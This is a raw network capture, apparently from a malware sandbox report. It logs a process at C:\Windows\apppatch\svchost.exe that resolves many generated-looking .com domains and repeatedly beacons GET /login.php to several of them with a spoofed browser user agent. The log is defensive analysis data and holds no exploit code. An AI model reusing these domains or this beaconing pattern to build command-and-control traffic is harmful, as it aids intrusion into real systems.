                                                                                                                                                                                                            Nov 11, 2024 18:08:50.289880037 CET1.1.1.1192.168.2.90x768dName error (3)lysyvax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.292509079 CET1.1.1.1192.168.2.90x1809Name error (3)qedyvap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.294442892 CET1.1.1.1192.168.2.90x4d82Name error (3)vonyryk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.298023939 CET1.1.1.1192.168.2.90x47d5Name error (3)galyhib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.298103094 CET1.1.1.1192.168.2.90x94b4Name error (3)qebylyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.298490047 CET1.1.1.1192.168.2.90x148bName error (3)vonyzut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.298774004 CET1.1.1.1192.168.2.90x4d7bName error (3)vowypim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.299803972 CET1.1.1.1192.168.2.90x9d12Name error (3)gatydab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.304564953 CET1.1.1.1192.168.2.90xd04bName error (3)qeqylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.304991961 CET1.1.1.1192.168.2.90x6096Name error (3)gahynuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.305924892 CET1.1.1.1192.168.2.90x2229Name error (3)pumytyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.306169987 CET1.1.1.1192.168.2.90xbeb5Name error (3)pujymiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.755846977 CET1.1.1.1192.168.2.90x93d4Name error (3)volymuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.760560036 CET1.1.1.1192.168.2.90x4ff3Name error (3)qedysol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.762048006 CET1.1.1.1192.168.2.90x1aa1Name error (3)pumyleg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.763237953 CET1.1.1.1192.168.2.90x4502Name error (3)lysysir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.764117002 CET1.1.1.1192.168.2.90x36eName error (3)galynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.766536951 CET1.1.1.1192.168.2.90xcba9Name error (3)qekynyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.771007061 CET1.1.1.1192.168.2.90x52dcName error (3)vonykam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.784015894 CET1.1.1.1192.168.2.90xe1eName error (3)pupypil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.784612894 CET1.1.1.1192.168.2.90x29a5Name error (3)lyvyjoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.787512064 CET1.1.1.1192.168.2.90x59d0Name error (3)pujybev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.851947069 CET1.1.1.1192.168.2.90x35ddName error (3)ganykah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.854372025 CET1.1.1.1192.168.2.90x2944Name error (3)vopyput.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.855278015 CET1.1.1.1192.168.2.90xc93aName error (3)gatypuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.858458996 CET1.1.1.1192.168.2.90x9728Name error (3)lyryler.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.859947920 CET1.1.1.1192.168.2.90x455cName error (3)pufypuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.864047050 CET1.1.1.1192.168.2.90x17c1Name error (3)qegysiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.864191055 CET1.1.1.1192.168.2.90x8e88Name error (3)lykynyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.865838051 CET1.1.1.1192.168.2.90xad1aName error (3)lymylen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.871624947 CET1.1.1.1192.168.2.90xec7Name error (3)qexynyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.873116016 CET1.1.1.1192.168.2.90x8fa8Name error (3)vocymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.873419046 CET1.1.1.1192.168.2.90x4999Name error (3)lygysid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.874150038 CET1.1.1.1192.168.2.90xd16eName error (3)vowykat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.874953032 CET1.1.1.1192.168.2.90xe370Name error (3)qetylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.875430107 CET1.1.1.1192.168.2.90xfc32Name error (3)vojydoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.876161098 CET1.1.1.1192.168.2.90x6383Name error (3)gahydos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.876173019 CET1.1.1.1192.168.2.90x564cName error (3)vojybef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.877188921 CET1.1.1.1192.168.2.90xb082Name error (3)qebykoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.877198935 CET1.1.1.1192.168.2.90xc4f8Name error (3)purylal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.881617069 CET1.1.1.1192.168.2.90x29bcName error (3)lyvymun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.883790970 CET1.1.1.1192.168.2.90xa6e2Name error (3)qebyqig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.886507034 CET1.1.1.1192.168.2.90x9adaName error (3)puvymug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.893651962 CET1.1.1.1192.168.2.90xac64Name error (3)gacynyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.895323038 CET1.1.1.1192.168.2.90xa3baName error (3)pumywov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.914482117 CET1.1.1.1192.168.2.90x222cName error (3)pujydap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.914716005 CET1.1.1.1192.168.2.90x5f08Name error (3)vopyzyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.269279957 CET1.1.1.1192.168.2.90x323bName error (3)qegyvag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.269311905 CET1.1.1.1192.168.2.90x1fa0Name error (3)qexyhul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.269932985 CET1.1.1.1192.168.2.90x354eName error (3)vowyrec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.271780968 CET1.1.1.1192.168.2.90xa0b2Name error (3)galyfez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.271795988 CET1.1.1.1192.168.2.90xd6aaName error (3)gatyzyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.272649050 CET1.1.1.1192.168.2.90xec86Name error (3)gacyhuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.289105892 CET1.1.1.1192.168.2.90x5460Name error (3)qekyfep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.290972948 CET1.1.1.1192.168.2.90x4833Name error (3)lyxygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.292593956 CET1.1.1.1192.168.2.90x635cName error (3)lysyxuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.082118988 CET1.1.1.1192.168.2.90xfc03Name error (3)lymywad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.082134008 CET1.1.1.1192.168.2.90x3ca0Name error (3)qedyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083174944 CET1.1.1.1192.168.2.90xe723Name error (3)ganyqib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083204985 CET1.1.1.1192.168.2.90xf2aName error (3)pufycog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083276033 CET1.1.1.1192.168.2.90xec36Name error (3)lykyfax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.083292961 CET1.1.1.1192.168.2.90x979aName error (3)lyrytyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.086327076 CET1.1.1.1192.168.2.90x978fName error (3)purytyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.088217020 CET1.1.1.1192.168.2.90xe8d7Name error (3)vofycim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.088229895 CET1.1.1.1192.168.2.90xe168Name error (3)vonyqof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.089378119 CET1.1.1.1192.168.2.90x90e5Name error (3)volygyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.090313911 CET1.1.1.1192.168.2.90x6145Name error (3)pupyxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.102423906 CET1.1.1.1192.168.2.90x1ae1Name error (3)qeqyrav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.104063034 CET1.1.1.1192.168.2.90xec0bName error (3)puzygyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.104610920 CET1.1.1.1192.168.2.90x1fd9Name error (3)gahyvab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.104624987 CET1.1.1.1192.168.2.90x4e12Name error (3)puvyjiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.105623960 CET1.1.1.1192.168.2.90x5e07Name error (3)gadycih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.105634928 CET1.1.1.1192.168.2.90x84ffName error (3)vocyjik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.105901957 CET1.1.1.1192.168.2.90x3987Name error (3)qetytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.111394882 CET1.1.1.1192.168.2.90xfbd7Name error (3)lygyvon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.543850899 CET1.1.1.1192.168.2.90x865dName error (3)puzybeq.comnonenoneA (IP address)IN (0x0001)false
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.9  56860        3.94.10.34      80                7444  C:\Windows\apppatch\svchost.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:07:37.709790945 CET  243                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lymyxid.com
Nov 11, 2024 18:07:38.142407894 CET  413                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.9  56861        23.253.46.64    80                7444  C:\Windows\apppatch\svchost.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:07:38.103235960 CET  243                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:07:38.533425093 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:33 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:07:38.533436060 CET  169                IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.9  56865        188.114.96.3    80                7444  C:\Windows\apppatch\svchost.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:07:38.110194921 CET  243                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
Nov 11, 2024 18:07:38.812273026 CET  964                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=glOaGdDO9BBkkhKiDNlpEXwH%2FNQZiIMw76v4gnJWKp8gk08wgQ8Gy7iTKIHjQjwdlZhVJLxwVYFShSoGWTfQmPiBWu9t4mj1LuWtzVizVz8deTIG3IPpzeYSU7UBoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1358c870c8e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1156&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.413921118 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.747898102 CET | 807 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:40 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WSX6vrUcOPLadbm1DOdJ2CQPL%2BgBGLE3R5t4eJ39Ck3%2FeAUV9SGvJV73CnaAvKBYHLfhQq3c9pkayYDKPazI9tfMl%2F8q%2BzhXWAuYfBfiDhXb4abowpeHnhtG%2BDudg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe141ee650c8e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=964&recv_bytes=486&delivery_rate=2443881&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.748049974 CET | 173 | IN |
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.751533985 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.152508974 CET | 803 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H3xQ5Xg8qhnS7BSEhQtrtcn7VDB74vy0LEsoQIppOUiSKe%2Bszd0Xt3A8iSK5vLlyTZ%2FiSqhmkIIlGu8RtksM0cfgTdGGWk2vX4rVHS1Zh7x46h0hDKMz5wO9Dn2Jtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1bacc270c8e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1132&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1944&recv_bytes=729&delivery_rate=3480769&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.158636093 CET | 173 | IN |
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.995275021 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.366235018 CET | 977 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:02 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SvQIyXg7NzrX6z6Gt56vhTRAOl55feJv5ridekP2w4WXT%2FyV3bhGpn73UlVZqHbL0Sm2bIpUDOU3ghnsMw2k7%2FJ8RdmONkBa1AJv2zHchfRgkz1dy%2B8aTXUv7JQXRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1c8ce8c0c8e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1158&sent=12&recv=14&lost=0&retrans=0&sent_bytes=2920&recv_bytes=972&delivery_rate=3480769&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                            3 | 192.168.2.9 | 56864 | 99.83.170.3 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.110460043 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.535010099 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                            4 | 192.168.2.9 | 56869 | 18.208.156.248 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.346312046 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vonypom.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.773797035 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                            5 | 192.168.2.9 | 56870 | 44.221.84.105 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.390280008 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.821355104 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                            6 | 192.168.2.9 | 56871 | 44.221.84.105 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
